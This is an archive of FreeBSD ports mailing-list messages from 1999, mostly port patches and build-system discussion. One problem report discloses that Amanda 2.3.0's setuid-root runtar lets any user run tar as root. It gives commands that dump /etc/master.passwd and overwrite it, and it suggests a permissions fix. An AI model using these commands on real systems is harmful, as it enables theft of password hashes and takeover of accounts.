(CET) Message-Id: <19991219232010.3E7A6575D@totem.fix.no> Date: Mon, 20 Dec 1999 00:20:10 +0100 (CET) From: Anders Nordby Reply-To: Anders Nordby To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15575: Bugfix of port: net/dante Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15575 >Category: ports >Synopsis: Bugfix of port: net/dante >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 15:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Anders Nordby >Release: FreeBSD 3.3-STABLE i386 >Organization: Fluxpod Information eXchange >Environment: FreeBSD eggsilo.bsdonline.org 3.3-STABLE FreeBSD 3.3-STABLE #0: Sun Dec 19 15:33:42 CET 1999 root@eggsilo.bsdonline.org:/usr/src/sys/compile/EGGSILO i386 >Description: From the developer: "CVSROOT: /share/inferno/src Module name: Changes by: michaels@bastesen.inet.no 99/12/16 10:01:28 Modified files: socks/sockd : sockd_io.c Log message: can't do rulespermit() that early, move to after connect(). Fixes a hang that could occur when using libwrap, thanks to Marc G. Fournier (marc.fournier@acadiau.ca) for help and testing." >How-To-Repeat: Run sockd with iotimeout set in sockd.conf. >Fix: diff -Nur dante.old/patches/patch-aa dante/patches/patch-aa --- dante.old/patches/patch-aa Thu Jan 1 01:00:00 1970 +++ dante/patches/patch-aa Sun Dec 19 21:39:00 1999 @@ -0,0 +1,76 @@ +--- sockd/sockd_io.c.orig Thu Sep 2 12:53:05 1999 ++++ sockd/sockd_io.c Sun Dec 19 21:37:35 1999 +@@ -44,7 +44,7 @@ + #include "common.h" + + static const char rcsid[] = +-"$Id: sockd_io.c,v 1.159 1999/09/02 10:42:04 michaels Exp $"; ++"$Id: sockd_io.c,v 1.162 1999/12/16 09:01:25 michaels Exp $"; + + /* + * Accept io objects from mother and does io on them. We never +@@ -819,8 +819,8 @@ + + /* + * If client hasn't sent us it's address yet we have to +- * assume the first packet is from is it. Client can only +- * blame itself if not. ++ * assume the first packet is from is it. ++ * Client can only blame itself if not. + */ + if (io->in.raddr.sin_addr.s_addr == htonl(INADDR_ANY) + || io->in.raddr.sin_port == htons(0)) { +@@ -836,30 +836,19 @@ + + /* LINTED pointer casts may be troublesome */ + sockaddr2sockshost((struct sockaddr *)&io->in.raddr, &io->src); +- +- /* +- * Do a rulecheck here with destination set to NULL, +- * if that isn't permitted nothing else is either from +- * this source so disconnect it. +- */ +- if (!rulespermit(io->in.s, &io->rule, &io->state, &io->src, +- NULL)) { +- delete_io(mother, io, io->in.s, IO_SRCBLOCK); +- return; +- } + } + + /* +- * When we receive the first packet we also have a fixed +- * source so connect the socket, both for better performance +- * and so that getpeername() will work on it, for +- * libwrap/rulespermit(). ++ * When we receive the first packet we also have a fixed source ++ * so connect the socket, both for better performance and so ++ * that getpeername() will work on it (libwrap/rulespermit()). + */ +- if (io->in.read == 0) { /* could happend more than once, but ok. */ ++ if (io->in.read == 0) { /* could happen more than once, but ok. */ + /* LINTED pointer casts may be troublesome */ + if (!sockaddrareeq((struct sockaddr *)&io->in.raddr, &from)) { + char src[MAXSOCKADDRSTRING], dst[MAXSOCKADDRSTRING]; + ++ /* perhaps this should be LOG_DEBUG. */ + slog(LOG_NOTICE, + "%s(0): %s: expected from %s, got it from %s", + VERDICT_BLOCKs, protocol2string(io->state.protocol), +@@ -871,6 +860,17 @@ + + if (connect(io->in.s, &from, sizeof(from)) != 0) { + delete_io(mother, io, io->in.s, IO_ERROR); ++ return; ++ } ++ ++ /* ++ * Do a rulecheck here with destination set to NULL. ++ * If that isn't permitted nothing else is either from ++ * this source so might as well disconnect it. ++ */ ++ if (!rulespermit(io->in.s, &io->rule, &io->state, &io->src, ++ NULL)) { ++ delete_io(mother, io, io->in.s, IO_SRCBLOCK); + return; + } + } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 16: 5:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 064F41516B; Sun, 19 Dec 1999 16:05:28 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA91000; Sun, 19 Dec 1999 16:05:27 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Sun, 19 Dec 1999 16:05:27 -0800 (PST) From: Message-Id: <199912200005.QAA91000@freefall.freebsd.org> To: jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15530: new port: irc/nethirc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port: irc/nethirc Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: jedgar Responsible-Changed-When: Sun Dec 19 16:04:29 PST 1999 Responsible-Changed-Why: I'll take this at submitter's request To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 18:40:34 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C409914F47 for ; Sun, 19 Dec 1999 18:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA01713; Sun, 19 Dec 1999 18:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.fwi.com (mail.fwi.com [209.84.160.144]) by hub.freebsd.org (Postfix) with SMTP id 86DA214D29 for ; Sun, 19 Dec 1999 18:39:32 -0800 (PST) (envelope-from croyle@gelemna.ft-wayne.in.us) Received: (qmail 20800 invoked from network); 20 Dec 1999 02:39:29 -0000 Received: from fw-line-160.fwi.com (HELO gelemna.ft-wayne.in.us) (209.84.172.165) by mail.fwi.com with SMTP; 20 Dec 1999 02:39:29 -0000 Received: (from croyle@localhost) by gelemna.ft-wayne.in.us (8.9.3/8.9.3) id VAA58151; Sun, 19 Dec 1999 21:38:53 -0500 (EST) (envelope-from croyle) Message-Id: <199912200238.VAA58151@gelemna.ft-wayne.in.us> Date: Sun, 19 Dec 1999 21:38:53 -0500 (EST) From: Don Croyle Reply-To: croyle@gelemna.ft-wayne.in.us To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15576: Update www/amaya to 2.4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15576 >Category: ports >Synopsis: Update www/amaya to 2.4 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 18:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Don Croyle >Release: FreeBSD 3.4-STABLE i386 >Organization: >Environment: >Description: These diffs update the www/amaya port to build the new version 2.4 (2.3 was an unannounced pre-release). They've made several more spell-checking dictionaries available, which vastly increased the amount of tapdancing needed allow for selectively installing them. It would be easier just to install them all, but does anyone actually use the things? Oh, well. At least the way I have it set up now, adding more will be simple. >How-To-Repeat: >Fix: Apply this patch: diff -ruN amaya.old/Makefile amaya/Makefile --- amaya.old/Makefile Sat Nov 13 21:09:58 1999 +++ amaya/Makefile Sun Dec 19 20:51:00 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: amaya -# Version required: 2.2 +# Version required: 2.4 # Date created: 26 Dec 1998 # Whom: Don Croyle # # $FreeBSD: ports/www/amaya/Makefile,v 1.7 1999/11/14 02:09:58 steve Exp $ # -DISTNAME= amaya-src-2.2 -PKGNAME= amaya-2.2 +DISTNAME= amaya-src-2.4 +PKGNAME= amaya-2.4 CATEGORIES= www MASTER_SITES= http://www.w3.org/Amaya/Distribution/ \ ftp://ftp.w3.org/pub/amaya/ \ @@ -22,11 +22,21 @@ DIST_SUBDIR= amaya DISTFILES= ${DISTNAME}${EXTRACT_SUFX} -.ifdef ENGLISH_DICT -DISTFILES+= English.tar.gz + +DICT?= none + +.if ${DICT} != "none" +.if ${DICT} == "all" +DISTFILES+= Dutch.tgz +DISTFILES+= English.tgz +DISTFILES+= French.tgz +DISTFILES+= German.tgz +DISTFILES+= Italian.tgz +DISTFILES+= Spanish.tgz +DISTFILES+= Swedish.tgz +.else +DISTFILES+= ${DICT:S/$/.tgz/g} .endif -.ifdef FRENCH_DICT -DISTFILES+= French.tar.gz .endif WRKSRC= ${WRKDIR}/Amaya/obj @@ -36,9 +46,9 @@ CONFIGURE_ARGS= --with-amaya pre-fetch: -.if !defined(ENGLISH_DICT) && !defined(FRENCH_DICT) - @${ECHO_MSG} To enable spell checking, define either - @${ECHO_MSG} ENGLISH_DICT or FRENCH_DICT +.if ${DICT} == "none" + @${ECHO_MSG} Several spellchecking dictionaries are available. To use + @${ECHO_MSG} one of them, define DICT to be the appropriate language. .endif post-extract: @@ -51,18 +61,13 @@ .for file in amaya print strip ${PREFIX}/Amaya/applis/bin/${file} .endfor - ${INSTALL_DATA} ${WRKSRC}/../amaya/COPYRIGHT.html ${PREFIX}/Amaya/amaya/ -.ifdef ENGLISH_DICT - ${INSTALL_DATA} ${WRKDIR}/dicopar/Eprinc.dic ${PREFIX}/Amaya/dicopar/ - ${MV} ${TMPPLIST} ${TMPPLIST}.new - ${ECHO} Amaya/dicopar/Eprinc.dic > ${TMPPLIST} - ${CAT} ${TMPPLIST}.new >> ${TMPPLIST} - ${RM} ${TMPPLIST}.new -.endif -.ifdef FRENCH_DICT - ${INSTALL_DATA} ${WRKDIR}/dicopar/Fprinc.dic ${PREFIX}/Amaya/dicopar/ + ${INSTALL_DATA} ${WRKSRC}/../amaya/COPYRIGHT.html\ + ${PREFIX}/Amaya/amaya/ +.if ${DICT} != "none" + ${INSTALL_DATA} ${WRKDIR}/*.dic ${PREFIX}/Amaya/dicopar/ ${MV} ${TMPPLIST} ${TMPPLIST}.new - ${ECHO} Amaya/dicopar/Fprinc.dic > ${TMPPLIST} + cd ${WRKDIR} && ls -1 *.dic | perl -pi -e 's|^|Amaya/dicopar/|'\ + > ${TMPPLIST} ${CAT} ${TMPPLIST}.new >> ${TMPPLIST} ${RM} ${TMPPLIST}.new .endif diff -ruN amaya.old/files/md5 amaya/files/md5 --- amaya.old/files/md5 Sat Nov 13 21:10:08 1999 +++ amaya/files/md5 Sun Dec 19 16:35:07 1999 @@ -1,3 +1,8 @@ -MD5 (amaya/amaya-src-2.2.tgz) = 0ba0f33f02e4e6ae5083feaf153c9ace -MD5 (amaya/English.tar.gz) = db59f59244fbc6698934aeefd6f5e53e -MD5 (amaya/French.tar.gz) = c18bd862588d187b86c5c0c4d0cfd306 +MD5 (amaya/amaya-src-2.4.tgz) = 0116711b648aa15898fa017c7e761cff +MD5 (amaya/Dutch.tgz) = 3edb9cce5ce160d7270b23808c1d5981 +MD5 (amaya/English.tgz) = 0e95d11b4817094b8cd9aa4010363806 +MD5 (amaya/French.tgz) = 791bc87281b27f10a987815aa7d10108 +MD5 (amaya/German.tgz) = 400eeeae974a64d23de4fcdd609c30bc +MD5 (amaya/Italian.tgz) = 05e2d25ee8af11faaaa25a33da89d504 +MD5 (amaya/Spanish.tgz) = b504a75cd0f789a3046bf2041067b18b +MD5 (amaya/Swedish.tgz) = 6536ab2e31e3f58618ba79d9fddc7f76 diff -ruN amaya.old/pkg/PLIST amaya/pkg/PLIST --- amaya.old/pkg/PLIST Sat Nov 13 21:10:12 1999 +++ amaya/pkg/PLIST Sun Dec 19 17:39:43 1999 @@ -39,22 +39,20 @@ Amaya/config/amaya.keyboard Amaya/config/de-amayadialogue Amaya/config/de-amayamsg +Amaya/config/de-corrdialogue Amaya/config/de-libdialogue Amaya/config/en-amayadialogue Amaya/config/en-amayamsg Amaya/config/en-corrdialogue Amaya/config/en-libdialogue -Amaya/config/en-transdialogue Amaya/config/fr-amayadialogue Amaya/config/fr-amayamsg Amaya/config/fr-corrdialogue Amaya/config/fr-libdialogue -Amaya/config/fr-transdialogue Amaya/config/tr-amayadialogue Amaya/config/tr-amayamsg Amaya/config/tr-corrdialogue Amaya/config/tr-libdialogue -Amaya/config/tr-transdialogue Amaya/config/unix-thot.rc Amaya/dicopar/alphabet Amaya/dicopar/american.ptn @@ -91,6 +89,7 @@ Amaya/doc/Icons/ProfilesMenu.gif Amaya/doc/Icons/ProxyMenu.gif Amaya/doc/Icons/PublishMenu.gif +Amaya/doc/Icons/Reload.png Amaya/doc/Icons/SaveAs.gif Amaya/doc/Icons/SourceJava.gif Amaya/doc/Icons/Sources.gif @@ -119,23 +118,28 @@ Amaya/doc/Icons/up.gif Amaya/doc/Icons/warning.gif Amaya/doc/Icons/w3c-amaya.gif +Amaya/doc/amaya/Access.html Amaya/doc/amaya/Attributes.html -Amaya/doc/amaya/Autoconf.html -Amaya/doc/amaya/BinDist.html Amaya/doc/amaya/Browsing.html Amaya/doc/amaya/CSS.html Amaya/doc/amaya/Changing.html Amaya/doc/amaya/Configure.html Amaya/doc/amaya/Creating.html +Amaya/doc/amaya/HTML-elements/40styling.html +Amaya/doc/amaya/HTML-elements/address.html +Amaya/doc/amaya/HTML-elements/headings.html +Amaya/doc/amaya/HTML-elements/infoTypes.html +Amaya/doc/amaya/HTML-elements/inline.html +Amaya/doc/amaya/HTML-elements/lists.html +Amaya/doc/amaya/HTML-elements/structure.html +Amaya/doc/amaya/HTML.html Amaya/doc/amaya/ImageMaps.html Amaya/doc/amaya/Keyboard.html Amaya/doc/amaya/Links.html Amaya/doc/amaya/MakeBook.html Amaya/doc/amaya/Manual.html Amaya/doc/amaya/Math.html -Amaya/doc/amaya/New.html Amaya/doc/amaya/Numbering.html -Amaya/doc/amaya/Plugins.html Amaya/doc/amaya/Printing.html Amaya/doc/amaya/Publishing.html Amaya/doc/amaya/Put.html @@ -159,6 +163,7 @@ @dirrm Amaya/config @dirrm Amaya/dicopar @dirrm Amaya/doc/Icons +@dirrm Amaya/doc/amaya/HTML-elements @dirrm Amaya/doc/amaya @dirrm Amaya/doc @dirrm Amaya/fonts >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 21:14:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8157815100; Sun, 19 Dec 1999 21:14:13 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA12127; Sun, 19 Dec 1999 21:14:13 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sun, 19 Dec 1999 21:14:13 -0800 (PST) From: Message-Id: <199912200514.VAA12127@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, jmacd@FreeBSD.org Subject: Re: ports/15461: Update of misc/xdelta port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update of misc/xdelta port Responsible-Changed-From-To: freebsd-ports->jmacd Responsible-Changed-By: steve Responsible-Changed-When: Sun Dec 19 21:13:52 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 21:14:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C03A151A2; Sun, 19 Dec 1999 21:14:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA12231; Sun, 19 Dec 1999 21:14:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sun, 19 Dec 1999 21:14:44 -0800 (PST) From: Message-Id: <199912200514.VAA12231@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, chuckr@FreeBSD.org Subject: Re: ports/15505: Update math/gnuplot Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update math/gnuplot Responsible-Changed-From-To: freebsd-ports->chuckr Responsible-Changed-By: steve Responsible-Changed-When: Sun Dec 19 21:14:18 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 21:15: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D16914CC3; Sun, 19 Dec 1999 21:15:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA12300; Sun, 19 Dec 1999 21:15:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sun, 19 Dec 1999 21:15:04 -0800 (PST) From: Message-Id: <199912200515.VAA12300@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, ache@FreeBSD.org Subject: Re: ports/15516: rsaref distfile location changed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: rsaref distfile location changed Responsible-Changed-From-To: freebsd-ports->ache Responsible-Changed-By: steve Responsible-Changed-When: Sun Dec 19 21:14:50 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 23: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 97EEF14F05 for ; Sun, 19 Dec 1999 23:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA19404; Sun, 19 Dec 1999 23:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 1A82E14FAF for ; Sun, 19 Dec 1999 22:51:39 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 946151B71; Mon, 20 Dec 1999 01:51:41 -0500 (EST) Message-Id: <19991220065141.946151B71@anarcat.dyndns.org> Date: Mon, 20 Dec 1999 01:51:41 -0500 (EST) From: beaupran@iro.umontreal.ca Reply-To: beaupran@iro.umontreal.ca To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15578: Amanda 2.3.0 runtar program allow any user to run tar as root Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15578 >Category: ports >Synopsis: Amanda 2.3.0 runtar program allow any user to run tar as root >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 23:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: AnarCat >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: Any FreeBSD box with a recent Amanda 2.3.0 package or port normally inst alled. >Description: [Sorry. This is a resend. The first got through as sparc/15577. Horrible typo. I don't know how to modify this apart from sending this one. ] As reported on BugTraq a while ago, Amanda 2.3.0 features a 'runtar' program that is 4755 root.wheel. This program simply calls 'tar' with the given arguments. This could be used to read or write any file on the system. Others executables are setuid in the same directory and may also create problems but I have not yet tested them through. >How-To-Repeat: Simple exploit: /usr/local/libexec/amanda/runtar fc - /etc/master.passwd cats /etc/master.passwd. This can obviously be done for whole file trees. /usr/local/libexec/amanda/runtar fc /etc/master.passwd my_passwd_file while conveniently overwrite /etc/master.passwd with a user-defined passwd file. >Fix: These are suggestions. I'm too unaware of the amanda system to be really sure of what I'm doing here. Runnning Amanda in a sandbox: (1) Create a 'amanda' group (2) make the /usr/local/libexec/amanda directory 510 root:amanda (3) chown all files in /usr/local/libexec/amanda root:amanda and chmod them 4510 This way, amanda will be 'exploitable' only if the 'amanda' group is compromised . Concretely, I suggest adding a pkg/INSTALL file and modifying the 'post-install' target in the Makefile: pkg/INSTALL: ---8<------8<--- CUT HERE ---8<------8<--- #! /bin/sh echo -n "Adding necessary groups and modifying permissions on " echo "${PREFIX}/libexec/amanda dir" group=amanda if pw groupshow "${group}" 2>/dev/null; then echo "You already have a group \"${group}\", so I will use it." else echo "You need a group \"${group}\"." if yesno "Would you like me to create it" y; then pw groupadd ${group} -h - || exit echo "Done." else echo "Please create it, and try again." exit 1 fi fi echo "Modifying permissions on ${PREFIX}/libexec/amanda" chown root:amanda ${PREFIX}/libexec/amanda chmod 510 ${PREFIX}/libexec/amanda chown root:amanda ${PREFIX}/libexec/amanda/* chmod 4550 ${PREFIX}/libexec/amanda/* ---8<------8<--- CUT HERE ---8<------8<--- Makefile diff: ---8<------8<--- CUT HERE ---8<------8<--- *** Makefile.orig Mon Dec 20 01:20:44 1999 --- Makefile Mon Dec 20 01:21:11 1999 *************** *** 22,26 **** --- 22,28 ---- post-install: ${MKDIR} ${PREFIX}/share/examples/amanda ${CP} -R ${WRKSRC}/example/* ${PREFIX}/share/examples/amanda + @PREFIX=${PREFIX} ${SH} ${PKGDIR}/INSTALL + .include ---8<------8<--- CUT HERE ---8<------8<--- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 23:56:43 1999 Delivered-To: freebsd-ports@freebsd.org Received: from shale.csir.co.za (shale.csir.co.za [146.64.46.5]) by hub.freebsd.org (Postfix) with ESMTP id DFA5815287 for ; Sun, 19 Dec 1999 23:56:18 -0800 (PST) (envelope-from reg@shale.csir.co.za) Received: from granite.hip.berkeley.edu (granite.hip.berkeley.edu [136.152.155.25]) by shale.csir.co.za (8.9.3/8.9.3) with ESMTP id JAA82996; Mon, 20 Dec 1999 09:50:21 +0200 (SAT) (envelope-from reg@shale.csir.co.za) Received: (from reg@localhost) by granite.hip.berkeley.edu (8.9.3/8.9.3) id XAA25175; Sun, 19 Dec 1999 23:47:51 -0800 (PST) (envelope-from reg) Date: Sun, 19 Dec 1999 23:47:51 -0800 From: Jeremy Lea To: Ade Lovett Cc: freebsd-ports@freebsd.org Subject: Re: RFC: USE_GTK and USE_GNOME rules for bsd.port.mk Message-ID: <19991219234751.A19524@shale.csir.co.za> References: <19991206190030.D82697@shale.csir.co.za> <19991206212812.A20823@lovett.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="vkogqOf2sHV7VnPd" X-Mailer: Mutt 1.0pre3i In-Reply-To: <19991206212812.A20823@lovett.com> Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --vkogqOf2sHV7VnPd Content-Type: text/plain; charset=us-ascii Hi, Sorry all, the time I thought I'd have between finals got swallowed up by a broken data aquisition system... On Mon, Dec 06, 1999 at 09:28:12PM -0600, Ade Lovett wrote: > 1. I don't think there's much to be had in dealing with GTK+ 1.0.x - > assuming my INDEX is up to date, I only see 6 ports that use > gtk-1.0.6, and one that uses ko-gtk-1.0.6, so the extra > complexity for different versions isn't really worth it here. Spoil sport, it's such a neat hack ;-) I'm not so much worrried here about GTK+ 1.0.x, but GTK+ 1.3.x. There's romours of this already, and if the last "development" branch is anything to go by, people will convert to it en mass... Plus when 1.4 gets here, we'll have the problem all over again. We could use the same thing for Qt 1.x and 2.x, rather than USE_QT and USE_QT2. > 2. I'm getting a little concerned about the number of knobs we're > adding to bsd.port.mk - perhaps the time has come to split all > the USE_* knobs out into their own file, included by bsd.port.mk Ok, attached are untested patches to make a bsd.port.use.mk, which includes both these patches and the bsd.port.optional.mk, into one file, included from bsd.port.mk. Is this cleaner? We need to decide what should and shouldn't go into this file... It uses PORTUSEMK and PORTOPTIONMK to encapsulate the two parts of the file. What we can do in the future (or now if the will is there), is do this: ... .include "/usr/share/mk/perl.use.mk" .include "${PORTSDIR}/x11-toolkits/qt142/use.mk" .include "${PORTSDIR}/x11/gnome/use.mk" ... At the end of the file (outside the ifdef's), slowly moving all of this out into their own, to be updated in sync with their ports. > 3. Extend the macros with a few more variables, to allow somewhat > easier port developing when major new versions turn up, eg: > > > +.if defined(USE_GLIB) > > +LIB_DEPENDS+= glib12.3:${PORTSDIR}/devel/glib12 > > +GLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config > > +.endif > > would become: > > USE_GLIB_DEPEND?= glib12.3:${PORTSDIR}/devel/glib12 > USE_GLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config > > ... > > .if defined(USE_GLIB) > LIB_DEPENDS+= ${USE_GLIB_DEPEND} > GLIB_CONFIG?= ${USE_GLIB_CONFIG} > ... > .endif I'm worried about this. Instead of using USE_GLIB, people will use USE_GLIB_DEPEND, and then we'll have to make sure that we don't break ports with this. Plus it leaves a lot of pollution. I've been thinking a bit more, and how's this for an idea, to make the optional dependancies more extensible (I'll work on implementing this): We make some "test-for" targets in bsd.port.mk (or maybe even in a bsd.port.rules.mk ). These would implement the test parts of the _DEPENDS_USE and lib-depends targets, and would work like .for i in ${LIB_OPTIONAL} do $LIB_DEPENDS+= `make test-for-lib TEST_LIB=$i` Basically, we use LIB_OPTIONAL (or BUILD_OPTIONAL, etc) in a port's Makefile, then cycle through these dependencies, and if they pass the test (ie they are there), then we echo back their dependency information. We could reuse the tests in the _DEPENDS_USE and lib-depends targets, by just cehcking for a non-null return value, although this might complicate reading... Comments? Regards, -Jeremy -- | What will people think when they hear that I'm a Jesus freak? --+-- What will people do when they find that it's true? | I don't really care if they label me a Jesus Freak, | There ain't no disguising the truth. - d c Talk --vkogqOf2sHV7VnPd Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="portmk.diff" diff -urN -x CVS /usr/ports.ref/Mk/bsd.optional.mk Mk/bsd.optional.mk --- /usr/ports.ref/Mk/bsd.optional.mk Wed Dec 31 16:00:00 1969 +++ Mk/bsd.optional.mk Sun Dec 19 23:27:04 1999 @@ -0,0 +1,3 @@ +PORTOPTIONMK= yes +.include "bsd.port.use.mk" +.undef PORTOPTIONMK diff -urN -x CVS /usr/ports.ref/Mk/bsd.port.mk Mk/bsd.port.mk --- /usr/ports.ref/Mk/bsd.port.mk Sat Nov 13 11:56:02 1999 +++ Mk/bsd.port.mk Sun Dec 19 23:28:04 1999 @@ -147,6 +147,18 @@ # USE_QT - Says that the port uses version 1 of the qt toolkit. # USE_QT2 - Says that the port uses version 2 of the qt toolkit. # Implies USE_NEWGCC. +# USE_GLIB - Says that the port uses the GLib package. +# USE_GTK - Says that the port uses the GTK+ toolkit. +# Values other than `yes' imply the version (default: 12) +# 12 - installs GLib/GTK+ 1.2.x +# 10 - installs GTK+ 1.0.x +# yes - installs the latest stable version +# USE_IMLIB - Says that the port uses the imlib library. +# USE_GNOME - Says that the port uses the GNOME desktop environment. +# libs - Only needs gnome-libs +# core - Only needs gnome-core +# control - Only needs gnome-controlcenter +# yes - Same as core # # Dependency checking. Use these if your port requires another port # not in the list above. @@ -562,6 +574,10 @@ PREFIX?= ${LOCALBASE} .endif +PORTOPTIONMK= yes +.include "bsd.port.use.mk" +.undef PORTOPTIONMK + .endif # End of pre-makefile section. @@ -597,88 +613,9 @@ MANCOMPRESSED?= no .endif -.if defined(USE_QT) -LIB_DEPENDS+= qt.2:${PORTSDIR}/x11-toolkits/qt142 -.endif - -.if defined(USE_QT2) -LIB_DEPENDS+= qt2.2:${PORTSDIR}/x11-toolkits/qt20 -USE_NEWGCC= yes -.endif - -.if defined(USE_BZIP2) -BUILD_DEPENDS+= bzip2:${PORTSDIR}/archivers/bzip2 -.endif -.if defined(USE_ZIP) -BUILD_DEPENDS+= unzip:${PORTSDIR}/archivers/unzip -.endif -.if defined(USE_GMAKE) -BUILD_DEPENDS+= gmake:${PORTSDIR}/devel/gmake -.endif -.if defined(USE_AUTOCONF) -GNU_CONFIGURE= yes -BUILD_DEPENDS+= autoconf:${PORTSDIR}/devel/autoconf -.endif -.if defined(USE_LIBTOOL) -GNU_CONFIGURE= yes -BUILD_DEPENDS+= libtool:${PORTSDIR}/devel/libtool -.if defined(USE_AUTOCONF) -LIBTOOLFILES?= aclocal.m4 -.else -LIBTOOLFILES?= configure -.endif -LIBTOOLFLAGS?= --disable-ltlibs -.endif -.if defined(USE_NEWGCC) && ${OSVERSION} < 400004 -CC= gcc295 -CXX= g++295 -BUILD_DEPENDS+= gcc295:${PORTSDIR}/lang/egcs -MAKE_ENV+= CC=${CC} CXX=${CXX} -.endif - -.if defined(REQUIRES_MOTIF) -LIB_DEPENDS+= Xpm.4:${PORTSDIR}/graphics/xpm -.if defined(PARALLEL_PACKAGE_BUILD) -BUILD_DEPENDS+= ${X11BASE}/lib/libXm.a:${PORTSDIR}/x11-toolkits/Motif-dummy -.endif -.endif - -PKG_IGNORE_DEPENDS?= 